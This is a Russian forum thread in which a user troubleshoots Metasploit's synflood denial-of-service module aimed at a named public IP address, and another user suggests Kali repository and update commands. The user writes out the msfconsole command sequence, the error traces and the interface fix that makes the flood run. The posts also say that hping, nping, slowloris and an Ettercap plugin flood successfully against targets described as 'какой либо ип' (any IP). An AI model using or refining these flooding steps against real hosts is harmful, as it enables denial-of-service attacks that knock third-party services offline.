1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

msfconsole

Тема в разделе "Помощь по всем вопросам.", создана пользователем LeMMinG, 28 мар 2015.

  1. TopicStarter Overlay
    LeMMinG

    LeMMinG

    Регистрация:
    27 дек 2013
    Сообщения:
    825
    Симпатии:
    448
    Такая вот лобуда, при попытке synflood на какой либо ип

    msf auxiliary(synflood) > set RHOST 89.253.231.10
    RHOST => 89.253.231.10
    msf auxiliary(synflood) > exploit
    /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:129: warning: unable to get IP: eth0: no IPv4 address assigned

    [*] SYN flooding 89.253.231.10:80...
    [*] Cannot stat device: eth0: no IPv4 address assigned
    [-] Auxiliary failed: RuntimeError Pcaprub error: eth0: no IPv4 address assigned
    [-] Call stack:
    [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:423:in `rescue in lookupnet'
    [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:415:in `lookupnet'
    [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:429:in `should_arp?'
    [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:304:in `lookup_eth'
    [-] /usr/share/metasploit-framework/lib/msf/core/exploit/capture.rb:256:in `capture_sendto'
    [-] /usr/share/metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb:63:in `run'
    [*] Auxiliary module execution completed
     
    Метки:
  2. TopicStarter Overlay
    LeMMinG

    LeMMinG

    Регистрация:
    27 дек 2013
    Сообщения:
    825
    Симпатии:
    448
    Вооще при попытке поюзать какой либо модуль такое вот. Пробовал и консольно через msfconsole и через armitage
    Всё одно
    [​IMG]
     
  3. Slowpoke

    Slowpoke

    Регистрация:
    22 авг 2012
    Сообщения:
    303
    Симпатии:
    135
    Судя по логам проблемы с сеткой. Как вариант вот, что сделай.

    Для начала на всякий случай проверь, чтобы у тебя в /etc/apt/sources.list было нечто вроде такого:

    Код:
    deb http://http.kali.org/ /kali main contrib non-free
    deb http://http.kali.org/ /wheezy main contrib non-free
    deb http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali-dev main/debian-installer
    deb-src http://http.kali.org/kali kali-dev main contrib non-free
    deb http://http.kali.org/kali kali main contrib non-free
    deb http://http.kali.org/kali kali main/debian-installer
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
    deb http://repo.kali.org/kali kali-bleeding-edge main
    Далее обнови всю систему, в том числе установисамые новые linux-headers:
    Код:
    apt-get update
    apt-get upgrade
    apt-get dist-upgrade
    apt-get install -y linux-headers-$(uname -r)
    По сути должно заработать.
     
  4. TopicStarter Overlay
    LeMMinG

    LeMMinG

    Регистрация:
    27 дек 2013
    Сообщения:
    825
    Симпатии:
    448
    Я понял. Ошибка исчезает если я делаю set INTERFACE ppp0
    Тогда сплойты работают

    Но теперь у мя проблема в следущем.
    При использовании msfconsole dos атак типа synflood у мя нет исходящего трафика.
    Хотя пишет што мол Synflooding <ip>:80....
    На примере использования metasploit/armitage:
    #msfconsole
    #use auxiliary/dos/tcp/synflood
    #set INTERFACE ppp0
    #set RHOST <ip>
    #exploit

    SynFlooding <ip>:80.....

    Смарю через системный монитор "Исполльзование сети"
    Либо tcpdumpом
    Исходящего трафика нету.
    Т.е. пакеты не идут
    Хотя нагрузка на ядра проца до 100% подскакивают
    Где пакеты?

    проверял вне метасплоита консоли hping и nping - флудят нормально, Исходящий трафик идёт в Системном мониторе и в tcpdump есть.
    Также проверял c помощью slowloris.pl
    Тоже атакует когда - трафик идёт.

    соединение ppp0 модем мегафоновский


    ЗЫ: тож самое при проведении дос с Ettercapa через плагин
    Пишет што атака идёт - исход. трафика нема

    В чом может быть дело?
     
  5. TopicStarter Overlay
    LeMMinG

    LeMMinG

    Регистрация:
    27 дек 2013
    Сообщения:
    825
    Симпатии:
    448
    Выяснил куда пакеты уходят. Досатаки идут по lo интерфейсу.
    [​IMG]
    врубил синфлуд и 1044 пакета ушло по lo. тобиш ко мне на 127.0.0.1.
    Если я обрубаю lo интерфейс
    #sudo ifconfig lo down
    тогда у мя армитаж и метасплойт не запускаецца, он коннектицца к базе скуля на 127.0.0.1.

    всё остальное норм работает на исходящие по ппп0. Сканеры там и прочее в армитаже
     

Поделиться этой страницей

Загрузка...